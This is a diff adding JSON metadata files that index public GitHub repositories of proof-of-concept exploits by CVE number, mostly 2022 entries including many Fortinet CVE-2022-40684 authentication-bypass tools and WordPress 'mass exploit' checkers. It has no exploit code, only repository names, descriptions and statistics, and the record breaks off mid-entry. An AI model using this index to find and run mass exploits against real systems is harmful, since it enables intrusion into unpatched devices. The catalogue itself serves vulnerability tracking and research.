b/2022/CVE-2022-4061.json new file mode 100644 index 0000000000..9de7f52a89 --- /dev/null +++ b/2022/CVE-2022-4061.json @@ -0,0 +1,42 @@ +[ + { + "id": 692616008, + "name": "JBWPer", + "full_name": "im-hanzou\/JBWPer", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/JBWPer", + "description": "Automatic Mass Tool for check and exploiting vulnerability in CVE-2022-4061 - JobBoardWP < 1.2.2 - Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2023-09-17T03:20:23Z", + "updated_at": "2024-08-12T20:32:46Z", + "pushed_at": "2023-09-17T10:05:02Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "bash", + "checker", + "cve-2022-4061", + "exploiter", + "shell-uploader", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 4, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40624.json b/2022/CVE-2022-40624.json new file mode 100644 index 0000000000..a858795c0b --- /dev/null +++ b/2022/CVE-2022-40624.json @@ -0,0 +1,33 @@ +[ + { + "id": 536848834, + "name": "pfBlockerNg-CVE-2022-40624", + "full_name": "dhammon\/pfBlockerNg-CVE-2022-40624", + "owner": { + "login": "dhammon", + "id": 69738058, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69738058?v=4", + "html_url": "https:\/\/github.com\/dhammon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dhammon\/pfBlockerNg-CVE-2022-40624", + "description": null, + "fork": false, + "created_at": "2022-09-15T03:24:55Z", + "updated_at": "2024-07-26T10:46:53Z", + "pushed_at": "2022-09-15T03:25:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4063.json b/2022/CVE-2022-4063.json new file mode 100644 index 0000000000..471b522376 --- /dev/null +++ b/2022/CVE-2022-4063.json @@ -0,0 +1,40 @@ +[ + { + "id": 690237690, + "name": "INPGer", + "full_name": "im-hanzou\/INPGer", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/INPGer", + "description": "Automatic Mass Tool for checking vulnerability in CVE-2022-4063 - InPost Gallery < 2.1.4.1 - Unauthenticated LFI to RCE", + "fork": false, + "created_at": "2023-09-11T20:01:04Z", + "updated_at": "2023-09-23T08:46:35Z", + "pushed_at": "2023-09-15T21:07:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automation", + "checker", + "cve-2022-4063", + "exploit", + "wordpress", + "wordpress-plugin" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40634.json b/2022/CVE-2022-40634.json new file mode 100644 index 0000000000..e16f67356a --- /dev/null +++ b/2022/CVE-2022-40634.json @@ -0,0 +1,43 @@ +[ + { + "id": 725995761, + "name": "CVE-2022-40634", + "full_name": "mbadanoiu\/CVE-2022-40634", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-40634", + "description": "CVE-2022-40634: FreeMarker Server-Side Template Injection in CrafterCMS", + "fork": false, + "created_at": "2023-12-01T10:06:17Z", + "updated_at": "2023-12-01T10:26:02Z", + "pushed_at": "2023-12-01T10:22:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "bypass", + "cve", + "cve-2020-25803", + "cve-2022-40634", + "cves", + "remote-code-execution", + "server-side-template-injection" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40635.json b/2022/CVE-2022-40635.json new file mode 100644 index 0000000000..03faa89fcc --- /dev/null +++ b/2022/CVE-2022-40635.json @@ -0,0 +1,42 @@ +[ + { + "id": 726003969, + "name": "CVE-2022-40635", + "full_name": "mbadanoiu\/CVE-2022-40635", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2022-40635", + "description": "CVE-2022-40635: Groovy Sandbox Bypass in CrafterCMS", + "fork": false, + "created_at": "2023-12-01T10:28:27Z", + "updated_at": "2023-12-08T07:22:30Z", + "pushed_at": "2023-12-01T10:33:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "authenticated", + "bypass", + "cve", + "cve-2022-40635", + "cves", + "groovy", + "remote-code-execution" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40684.json b/2022/CVE-2022-40684.json new file mode 100644 index 0000000000..b7d09a7624 --- /dev/null +++ b/2022/CVE-2022-40684.json @@ -0,0 +1,731 @@ +[ + { + "id": 550911062, + "name": "CVE-2022-40684", + "full_name": "horizon3ai\/CVE-2022-40684", + "owner": { + "login": "horizon3ai", + "id": 79593994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4", + "html_url": "https:\/\/github.com\/horizon3ai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2022-40684", + "description": "A proof of concept exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager", + "fork": false, + "created_at": "2022-10-13T14:24:12Z", + "updated_at": "2024-11-07T04:30:05Z", + "pushed_at": "2022-10-13T15:25:00Z", + "stargazers_count": 341, + "watchers_count": 341, + "has_discussions": false, + "forks_count": 90, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 90, + "watchers": 341, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 551028490, + "name": "CVE-2022-40684", + "full_name": "carlosevieira\/CVE-2022-40684", + "owner": { + "login": "carlosevieira", + "id": 24918013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24918013?v=4", + "html_url": "https:\/\/github.com\/carlosevieira", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/carlosevieira\/CVE-2022-40684", + "description": "PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)", + "fork": false, + "created_at": "2022-10-13T18:13:59Z", + "updated_at": "2024-08-12T20:27:46Z", + "pushed_at": "2022-10-13T20:13:44Z", + "stargazers_count": 87, + "watchers_count": 87, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 34, + "watchers": 87, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 551073912, + "name": "Fortinet-PoC-Auth-Bypass", + "full_name": "Filiplain\/Fortinet-PoC-Auth-Bypass", + "owner": { + "login": "Filiplain", + "id": 85502601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85502601?v=4", + "html_url": "https:\/\/github.com\/Filiplain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Filiplain\/Fortinet-PoC-Auth-Bypass", + "description": "Bash PoC for Fortinet Auth Bypass - CVE-2022-40684", + "fork": false, + "created_at": "2022-10-13T19:53:17Z", + "updated_at": "2024-05-07T17:16:35Z", + "pushed_at": "2023-04-02T12:44:53Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551104587, + "name": "CVE-2022-40684-POC", + "full_name": "kljunowsky\/CVE-2022-40684-POC", + "owner": { + "login": "kljunowsky", + "id": 104329412, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104329412?v=4", + "html_url": "https:\/\/github.com\/kljunowsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kljunowsky\/CVE-2022-40684-POC", + "description": "Exploit for CVE-2022-40684 affecting Fortinet FortiOS, FortiProxy, and FortiSwitchManager", + "fork": false, + "created_at": "2022-10-13T21:07:50Z", + "updated_at": "2024-04-21T17:20:57Z", + "pushed_at": "2023-01-21T02:17:48Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "bugbounty", + "cve-2022-40684", + "exploit", + "fortios", + "fortiproxy", + "penetration-testing", + "poc", + "security" + ], + "visibility": "public", + "forks": 2, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551185144, + "name": "CVE-2022-40684", + "full_name": "secunnix\/CVE-2022-40684", + "owner": { + "login": "secunnix", + "id": 104568161, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104568161?v=4", + "html_url": "https:\/\/github.com\/secunnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secunnix\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-14T01:07:01Z", + "updated_at": "2024-08-12T20:27:46Z", + "pushed_at": "2022-10-14T13:28:24Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 551411022, + "name": "CVE-2022-40684", + "full_name": "iveresk\/CVE-2022-40684", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-14T10:53:50Z", + "updated_at": "2022-10-17T02:03:27Z", + "pushed_at": "2022-10-17T16:42:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551413732, + "name": "CVE-2022-40684", + "full_name": "mhd108\/CVE-2022-40684", + "owner": { + "login": "mhd108", + "id": 52637601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52637601?v=4", + "html_url": "https:\/\/github.com\/mhd108", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhd108\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-14T11:00:40Z", + "updated_at": "2022-10-14T11:00:40Z", + "pushed_at": "2022-10-14T11:01:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 551914399, + "name": "cve-2022-40684", + "full_name": "ClickCyber\/cve-2022-40684", + "owner": { + "login": "ClickCyber", + "id": 66947475, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66947475?v=4", + "html_url": "https:\/\/github.com\/ClickCyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ClickCyber\/cve-2022-40684", + "description": "exploit for CVE-2022-40684 Fortinet", + "fork": false, + "created_at": "2022-10-15T11:34:17Z", + "updated_at": "2024-08-12T20:27:48Z", + "pushed_at": "2022-10-15T11:36:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552028942, + "name": "CVE-2022-40684", + "full_name": "Chocapikk\/CVE-2022-40684", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-40684", + "description": "Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [ Mass Exploit ]", + "fork": false, + "created_at": "2022-10-15T16:51:25Z", + "updated_at": "2024-10-11T04:59:31Z", + "pushed_at": "2022-10-19T16:27:16Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 552033176, + "name": "CVE-2022-40684", + "full_name": "mohamedbenchikh\/CVE-2022-40684", + "owner": { + "login": "mohamedbenchikh", + "id": 58364955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58364955?v=4", + "html_url": "https:\/\/github.com\/mohamedbenchikh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mohamedbenchikh\/CVE-2022-40684", + "description": "Exploit for CVE-2022-40684 vulnerability", + "fork": false, + "created_at": "2022-10-15T17:02:49Z", + "updated_at": "2024-05-02T10:58:24Z", + "pushed_at": "2022-10-15T17:03:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "cve-2022-40684", + "exploit", + "fortigate", + "fortipwn" + ], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552090151, + "name": "CVE-2022-40684", + "full_name": "HAWA771\/CVE-2022-40684", + "owner": { + "login": "HAWA771", + "id": 88245571, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88245571?v=4", + "html_url": "https:\/\/github.com\/HAWA771", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HAWA771\/CVE-2022-40684", + "description": "Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [ Mass Exploit ]", + "fork": false, + "created_at": "2022-10-15T19:43:48Z", + "updated_at": "2022-10-15T19:45:12Z", + "pushed_at": "2022-10-15T17:01:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 552157153, + "name": "CVE-2022-40684", + "full_name": "NeriaBasha\/CVE-2022-40684", + "owner": { + "login": "NeriaBasha", + "id": 99290038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99290038?v=4", + "html_url": "https:\/\/github.com\/NeriaBasha", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NeriaBasha\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-16T00:23:16Z", + "updated_at": "2022-10-21T09:46:35Z", + "pushed_at": "2022-10-16T00:25:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552603702, + "name": "fortipwn", + "full_name": "Grapphy\/fortipwn", + "owner": { + "login": "Grapphy", + "id": 76534455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76534455?v=4", + "html_url": "https:\/\/github.com\/Grapphy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Grapphy\/fortipwn", + "description": "Forti CVE-2022-40684 enumeration script built in Rust", + "fork": false, + "created_at": "2022-10-16T23:50:30Z", + "updated_at": "2022-10-24T10:59:14Z", + "pushed_at": "2022-10-21T19:45:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 552802042, + "name": "CVE-2022-40684", + "full_name": "puckiestyle\/CVE-2022-40684", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-17T08:49:36Z", + "updated_at": "2022-10-17T08:49:50Z", + "pushed_at": "2022-10-17T08:49:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 552819450, + "name": "Fortinet-CVE-2022-40684", + "full_name": "jsongmax\/Fortinet-CVE-2022-40684", + "owner": { + "login": "jsongmax", + "id": 54309806, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54309806?v=4", + "html_url": "https:\/\/github.com\/jsongmax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jsongmax\/Fortinet-CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-17T09:22:57Z", + "updated_at": "2022-10-18T09:15:41Z", + "pushed_at": "2022-10-17T09:44:44Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 554478703, + "name": "CVE-2022-40684", + "full_name": "und3sc0n0c1d0\/CVE-2022-40684", + "owner": { + "login": "und3sc0n0c1d0", + "id": 32236059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32236059?v=4", + "html_url": "https:\/\/github.com\/und3sc0n0c1d0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/und3sc0n0c1d0\/CVE-2022-40684", + "description": "Utilities for exploiting vulnerability CVE-2022-40684 (FortiOS \/ FortiProxy \/ FortiSwitchManager - Authentication bypass on administrative interface).", + "fork": false, + "created_at": "2022-10-19T22:07:24Z", + "updated_at": "2022-12-29T16:39:58Z", + "pushed_at": "2022-10-24T17:10:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 557616560, + "name": "CVE-2022-40684", + "full_name": "qingsiweisan\/CVE-2022-40684", + "owner": { + "login": "qingsiweisan", + "id": 56376918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56376918?v=4", + "html_url": "https:\/\/github.com\/qingsiweisan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/qingsiweisan\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-26T01:48:14Z", + "updated_at": "2024-02-11T20:21:46Z", + "pushed_at": "2022-10-26T02:16:39Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 558449420, + "name": "CVE-2022-40684-metasploit-scanner", + "full_name": "TaroballzChen\/CVE-2022-40684-metasploit-scanner", + "owner": { + "login": "TaroballzChen", + "id": 27862593, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27862593?v=4", + "html_url": "https:\/\/github.com\/TaroballzChen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TaroballzChen\/CVE-2022-40684-metasploit-scanner", + "description": "An authentication bypass using an alternate path or channel in Fortinet product", + "fork": false, + "created_at": "2022-10-27T15:11:27Z", + "updated_at": "2025-01-06T06:29:15Z", + "pushed_at": "2022-10-27T15:32:53Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 558508203, + "name": "gotigate", + "full_name": "gustavorobertux\/gotigate", + "owner": { + "login": "gustavorobertux", + "id": 38466612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38466612?v=4", + "html_url": "https:\/\/github.com\/gustavorobertux", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gustavorobertux\/gotigate", + "description": "Exploit Fortigate - CVE-2022-40684", + "fork": false, + "created_at": "2022-10-27T17:30:08Z", + "updated_at": "2022-11-05T22:48:50Z", + "pushed_at": "2022-10-28T15:26:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 558681373, + "name": "CVE-2022-40684", + "full_name": "hughink\/CVE-2022-40684", + "owner": { + "login": "hughink", + "id": 105833193, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105833193?v=4", + "html_url": "https:\/\/github.com\/hughink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hughink\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2022-10-28T03:46:00Z", + "updated_at": "2024-08-19T11:50:13Z", + "pushed_at": "2022-10-28T04:07:23Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 589898622, + "name": "CVE-2022-40684-Rust", + "full_name": "notareaperbutDR34P3r\/CVE-2022-40684-Rust", + "owner": { + "login": "notareaperbutDR34P3r", + "id": 118025285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118025285?v=4", + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/notareaperbutDR34P3r\/CVE-2022-40684-Rust", + "description": null, + "fork": false, + "created_at": "2023-01-17T07:49:25Z", + "updated_at": "2023-01-17T08:08:39Z", + "pushed_at": "2023-01-17T08:08:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 607300331, + "name": "CVE-2022-40684", + "full_name": "z-bool\/CVE-2022-40684", + "owner": { + "login": "z-bool", + "id": 111605994, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111605994?v=4", + "html_url": "https:\/\/github.com\/z-bool", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z-bool\/CVE-2022-40684", + "description": "一键枚举所有用户名以及写入SSH公钥", + "fork": false, + "created_at": "2023-02-27T18:05:34Z", + "updated_at": "2023-03-21T04:01:30Z", + "pushed_at": "2023-02-27T18:10:44Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 691773632, + "name": "CVE-2022-40684", + "full_name": "Anthony1500\/CVE-2022-40684", + "owner": { + "login": "Anthony1500", + "id": 51546831, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51546831?v=4", + "html_url": "https:\/\/github.com\/Anthony1500", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Anthony1500\/CVE-2022-40684", + "description": null, + "fork": false, + "created_at": "2023-09-14T21:29:03Z", + "updated_at": "2023-09-14T21:29:27Z", + "pushed_at": "2023-09-14T21:29:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40687.json b/2022/CVE-2022-40687.json new file mode 100644 index 0000000000..a47be9dfe9 --- /dev/null +++ b/2022/CVE-2022-40687.json @@ -0,0 +1,33 @@ +[ + { + "id": 558768664, + "name": "CVE-2022-40687-metasploit-scanner", + "full_name": "williamkhepri\/CVE-2022-40687-metasploit-scanner", + "owner": { + "login": "williamkhepri", + "id": 4558401, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4558401?v=4", + "html_url": "https:\/\/github.com\/williamkhepri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/williamkhepri\/CVE-2022-40687-metasploit-scanner", + "description": "Omisión de autenticación utilizando una ruta o canal alternativa en el producto de Fortinet.", + "fork": false, + "created_at": "2022-10-28T08:53:12Z", + "updated_at": "2022-11-03T00:51:37Z", + "pushed_at": "2022-11-02T15:23:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40769.json b/2022/CVE-2022-40769.json new file mode 100644 index 0000000000..85b8aab9bc --- /dev/null +++ b/2022/CVE-2022-40769.json @@ -0,0 +1,33 @@ +[ + { + "id": 594246349, + "name": "CVE-2022-40769", + "full_name": "PLSRcoin\/CVE-2022-40769", + "owner": { + "login": "PLSRcoin", + "id": 99826299, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99826299?v=4", + "html_url": "https:\/\/github.com\/PLSRcoin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PLSRcoin\/CVE-2022-40769", + "description": "profanity through 1.60 has only four billion possible RNG initializations. Thus, attackers can recover private keys from Ethereum vanity addresses and steal cryptocurrency, as exploited in the wild in June 2022. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-28T00:12:31Z", + "updated_at": "2023-02-20T14:52:04Z", + "pushed_at": "2022-12-29T15:29:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40799.json b/2022/CVE-2022-40799.json new file mode 100644 index 0000000000..955956e457 --- /dev/null +++ b/2022/CVE-2022-40799.json @@ -0,0 +1,37 @@ +[ + { + "id": 631698732, + "name": "CVE-2022-40799", + "full_name": "rtfmkiesel\/CVE-2022-40799", + "owner": { + "login": "rtfmkiesel", + "id": 79413747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79413747?v=4", + "html_url": "https:\/\/github.com\/rtfmkiesel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rtfmkiesel\/CVE-2022-40799", + "description": "D-Link DNR-322L - Authenticated Remote Code Execution", + "fork": false, + "created_at": "2023-04-23T20:42:18Z", + "updated_at": "2023-09-13T21:48:44Z", + "pushed_at": "2023-04-23T20:42:28Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "dlink", + "python" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-40881.json b/2022/CVE-2022-40881.json new file mode 100644 index 0000000000..3f0b71c784 --- /dev/null +++ b/2022/CVE-2022-40881.json @@ -0,0 +1,33 @@ +[ + { + "id": 606333124, + "name": "CVE-2022-40881", + "full_name": 